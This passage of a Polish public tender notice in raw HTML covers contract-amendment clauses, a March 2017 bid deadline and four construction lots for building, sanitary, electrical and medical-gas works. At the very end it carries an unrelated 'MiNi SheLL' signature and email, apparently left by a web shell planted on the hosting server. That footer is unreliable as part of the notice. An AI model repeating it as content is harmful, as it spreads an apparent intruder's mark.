d)	zaistnieje konieczność zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem umowy,
e)	zaistnieje konieczność realizacji robót wynikających z wprowadzenia w dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego, wynikających z art. 36a ust. 1 ustawy Prawo budowlane,
f)	w przypadku wystąpienia warunków terenu budowy odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,
g)	zaistnieje konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
h)	w przypadku wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,
i) w przypadku każdej zmianę w stosunku do treści oferty, która przyczyni się do obniżenia kosztów    wykonania przedmiotu zamówienia, w szczególności związaną z rozwiązaniami technologicznymi, technicznymi i materiałowymi, z zachowaniem ogólnego rodzaju zamówienia i jego celu i charakteru;
3) zmiana organizacji spełniania świadczenia:
a) zmiana treści dokumentów przedstawianych wzajemnie przez strony w trakcie realizacji umowy lub sposobu informowania o realizacji umowy, przy czym zmiana ta nie może spowodować braku informacji niezbędnych Zamawiającemu do prawidłowej realizacji umowy,
b) zmiany zasad oznaczania rzeczy lub obiektów, jeśli oznaczenie nie narusza prawa i zasad bezpieczeństwa;
4) wydłużenie gwarancji;
5) zmiana osób pełniących funkcje kierowników  budów (robót) z zachowaniem wymagań
           określonych  w postępowaniu (SIWZ) oraz § 24 ust. 1 niniejszej umowy;
6) zmiana podwykonawców uczestniczących w realizacji zamówienia - zgodnie z zasadami
           określonymi w Kodeksie cywilnym - lub wyłączenie podwykonawcy z udziału w realizacji
           zamówienia; jeżeli Wykonawca polegał na wiedzy i doświadczeniu podwykonawców (zgodnie z
           art. 26 ust. 2b ustawy Pzp) i uczestniczyli oni w wykonaniu zamówienia, nowy podwykonawca
           powinien spełniać co najmniej te same warunki uczestnictwa określone w postępowaniu na
           wykonanie zamówienia, co podwykonawca odstępujący od realizacji zamówienia;
7) w przypadku samodzielnej realizacji zamówienia przez Wykonawcę, Zamawiający przewiduje
          możliwość przystąpienia podwykonawców do zobowiązania; Wykonawca zobowiązany będzie
           do podania zakresu udziału podwykonawców i powodów włączenia ich do realizacji Umowy;
8) rozszerzenie dokumentacji projektowej o roboty dodatkowe, których konieczność wykonania
           została stwierdzona przez przedstawicieli Stron w drodze protokołu konieczności;
9) wprowadzenia robót zamiennych w stosunku do przewidzianych dokumentacją projektową, 
          w sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego  zgodnego 
          z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami 
          wykonania  przedmiotu umowy;
10) rezygnacja z wykonania pewnych robót przewidzianych w dokumentacji projektowej, 
             w sytuacji gdy ich wykonanie będzie zbędne do prawidłowego - zgodnego z zasadami wiedzy
             technicznej i obowiązującymi na dzień odbioru robót przepisami - wykonania przedmiotu
             umowy i odpowiedniego obniżenia wynagrodzenia;
11) ewentualne roboty nieprzewidziane dokumentacją (w tym roboty zamienne, dodatkowe 
          i zamówienia dodatkowe), które wynikną w trakcie realizacji przedmiotu umowy, będą
         wycenione odrębnie na podstawie danych wyjściowych do kosztorysowania ujętych w ofercie- 
         w oparciu o zatwierdzony przez Zamawiającego protokół konieczności
12) w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień
             niniejszej umowy do zaistniałego stanu prawnego lub faktycznego spowodowanego
             zmianą powszechnie obowiązujących przepisów prawa lub wynikających
             z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych
            organów.  
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 16/03/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Branża budowlana<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a)	Wszystkie roboty objęte opracowaniami projektowymi i przedmiarem w zakresie branży budowlanej i robotami zobowiązaniowymi wynikającymi z treści umowy na wykonanie robót - Szczegółowe informacje zgodnie z SIWZ<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45210000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Branża sanitarna<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a)	Wszystkie roboty objęte opracowaniami projektowymi i przedmiarem w zakresie branży sanitarnej w tym zabudów i robót poinstalacyjnych poniżej II piętra z wentylacją i klimatyzacją i jej elementami na dachu łącznika i poddaszu budynku D z wyłączeniem branży gazy medyczne, 
b)	Dostawa instalacja i uruchomienie urządzeń o parametrach określonych w dokumentacji projektowej
c)	robotami zobowiązaniowymi wynikającymi z treści umowy na wykonanie robót
 - Szczegółowe informacje zgodnie z SIWZ
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>44160000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Branża elektryczna<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a)	Wszystkie roboty objęte opracowaniami projektowymi i przedmiarem w zakresie branży elektrycznej w tym zabudów i robót poinstalacyjnych poniżej II piętra 
b)	Dostawa instalacja i uruchomienie urządzeń o parametrach określonych w dokumentacji projektowej
c)	robotami zobowiązaniowymi wynikającymi z treści umowy na wykonanie robót
- Szczegółowe informacje zgodnie z SIWZ
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45315400-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Gazy medyczne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a)	Wszystkie roboty objęte opracowaniami projektowymi i przedmiarem w zakresie branży gazy medyczne
b)	Roboty elektryczne z przedmiaru robót gazów medycznych ujętych w dziale 2 przedmiaru;
c)	Dostawa instalacja i uruchomienie urządzeń określonych w załączniku nr 8 do SIWZ, oraz urządzeń nie ujętych w załączniku nr  8 do SIWZ, a ujętych w dokumentacji projektowej .
d)	robotami zobowiązaniowymi wynikającymi z treści umowy na wykonanie robót
- Szczegółowe informacje zgodnie z SIWZ
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45220000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com